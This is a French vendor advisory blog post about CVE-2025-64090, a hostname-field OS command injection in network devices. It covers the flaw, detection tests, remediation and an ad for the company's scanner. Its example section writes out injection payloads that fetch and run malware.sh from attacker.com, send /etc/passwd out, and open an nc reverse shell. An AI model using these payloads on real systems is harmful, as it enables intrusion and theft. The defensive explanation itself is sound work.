剣 KENSAI
CVE CRITIQUE 9 janvier 2026 · 8 min de lecture

CVE-2025-64090 : une injection de commandes via le champ nom d'hôte de l'appareil permet une compromission complète du système

Des attaquants authentifiés peuvent exécuter des commandes OS arbitraires en injectant des métacaractères shell dans le champ nom d'hôte de l'appareil. CVSS 10.0. Une classe de vulnérabilité courante dans les appareils réseau et systèmes embarqués qui produit systématiquement un impact critique.


CVSS 10.0 — CRITIQUE
ChampDétail
ID CVECVE-2025-64090
GravitéCRITIQUE (CVSS 3.1 : 10.0)
Type de vulnérabilitéInjection de commandes OS (CWE-78)
Publié le9 janvier 2026
Authentification requiseOui (faible privilège)
Vecteur d'attaqueRéseau

Qu'est-ce que CVE-2025-64090 ?

CVE-2025-64090 est une vulnérabilité d'injection de commandes où le champ de configuration du nom d'hôte de l'appareil est transmis sans nettoyage à une commande shell sous-jacente. En insérant des métacaractères shell (;, |, `, $()) dans la valeur du nom d'hôte, des attaquants authentifiés peuvent s'échapper du contexte de commande prévu et exécuter des commandes OS arbitraires avec les privilèges du processus de gestion de l'appareil — typiquement root.

Cette classe de vulnérabilité est endémique dans les appareils réseau, le matériel IoT, les routeurs, les pare-feux et les systèmes Linux embarqués où les interfaces de gestion web construisent des commandes shell à partir de valeurs de configuration fournies par l'utilisateur sans nettoyage approprié.

⚠ Faible barrière vers une compromission complète

Tout utilisateur authentifié — y compris les comptes à faible privilège — peut obtenir une exécution de commandes au niveau root. Dans les environnements où des identifiants par défaut ou faibles existent, cela devient effectivement une exploitation non authentifiée.

Mécanique de l'injection de commandes

# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)

# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id >  /var/www/html/pwned.txt)

# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh

Versions concernées

Consultez l'avis du fournisseur pour connaître les modèles matériels et versions de firmware spécifiques. Les appareils réseau dotés d'interfaces de gestion web exposant la configuration du nom d'hôte constituent la principale surface de risque.

Méthodes de détection

Test d'injection via le nom d'hôte


# Manual test: submit hostname with command injection payload
# Use time-delay to confirm blind injection
POST /admin/network/hostname
hostname=test%3Bsleep%205

# If response delays ~5 seconds: vulnerable

# Out-of-band confirmation:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 Détection KENSAI : Le scanner de sécurité des appareils de KENSAI teste les champs de l'interface de gestion, y compris le nom d'hôte, le DNS, le NTP et la configuration SNMP, pour l'injection de commandes OS. Les motifs de CVE-2025-64090 sont inclus dans les profils d'évaluation des appareils réseau.

Étapes de remédiation

  1. Appliquer la mise à jour du firmware du fournisseur immédiatement.
  2. Validation des entrées : Les champs de nom d'hôte ne devraient accepter que des caractères alphanumériques et des traits d'union (conformes RFC 952/1123).
  3. Utiliser des API sûres : Remplacez la construction de commandes shell par des appels système acceptant des tableaux d'arguments (sans interpolation shell).
  4. Restreindre l'interface de gestion : Limitez l'accès à l'interface de gestion aux plages IP de confiance via des règles de pare-feu.
  5. Changer les identifiants par défaut : Assurez-vous que tous les comptes de gestion utilisent des mots de passe forts et uniques.
  6. Segmentation réseau : Isolez les interfaces de gestion des réseaux accessibles aux utilisateurs.

De l'injection de commandes dans vos appareils réseau ?

KENSAI analyse les appareils réseau et les interfaces de gestion à la recherche de vulnérabilités d'injection de commandes, y compris CVE-2025-64090. Identifiez les appareils vulnérables avant que les attaquants n'obtiennent un point d'ancrage.

Analysez gratuitement vos appareils réseau

Publié par l'équipe de recherche en sécurité KENSAI · Plus d'analyses de CVE

Articles connexes

La France signale une baisse des ransomwares grâce à NIS2 Mauvaise configuration CORS : guide complet de détection et de prévention La France (ANSSI) signale une baisse des ransomwares